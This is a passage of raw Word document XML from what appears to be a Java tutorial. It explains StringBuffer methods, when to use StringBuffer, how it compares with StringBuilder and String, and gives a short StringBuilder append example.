                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Due to synchronization overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13BB4773" w14:textId="40CA57C4" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC83A4" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Buffer</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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2EFE3" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ppen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 Rock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Add text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219B1FB" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ser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4</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Programm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nsert at index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDADD8" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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plac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4</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Pyth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Replace part of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43931222" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sb</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delet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6</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Delete part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B73F2" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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vers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Reverse string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C03B3" w14:textId="77777777" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A57A40" w14:textId="1DEEEE57" w:rsidR="00B27777" w:rsidRPr="00CE4B95"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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC962CF" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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When to use StringBuffer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE058E4" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use StringBuffer when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF1DC9" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E684A2" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are working in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B01CF" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You don’t want to use manual synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61013C90" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B27777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="59BF4668">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D3C67" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82F7F5" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuffer = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable + thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F6937" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prefer StringBuilder in single-threaded contexts for better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76243C71" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use String when data is constant and doesn't change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B133A64" w14:textId="0DC30409" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5CADAC97">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB6FD4B" w14:textId="3E572E4D" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc196307500"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is StringBuilder?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="668A6563" w14:textId="34C3D90E" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="005E48C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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StringBuilder in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66606200" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuilder is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sequence of characters, like StringBuffer, but it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C8E71" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where performance is important and you need to frequently modify strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031142DF" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than StringBuffer because it doesn't incur the overhead of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F12DE" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D536E7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="32EE3FA1">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3AEC9" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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StringBuilder Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3505D4" w14:textId="77777777" w:rsidR="00C44C2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C44C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8752062"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Builder</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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D5303" w14:textId="77777777" w:rsidR="00C44C2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C44C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8752062"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ppen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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495CEEB" w14:textId="1463D340" w:rsidR="00C44C2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C44C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8752062"/>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 Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583655B4" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>append() modifies the content of the original object, and no new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782BF9F" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D536E7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
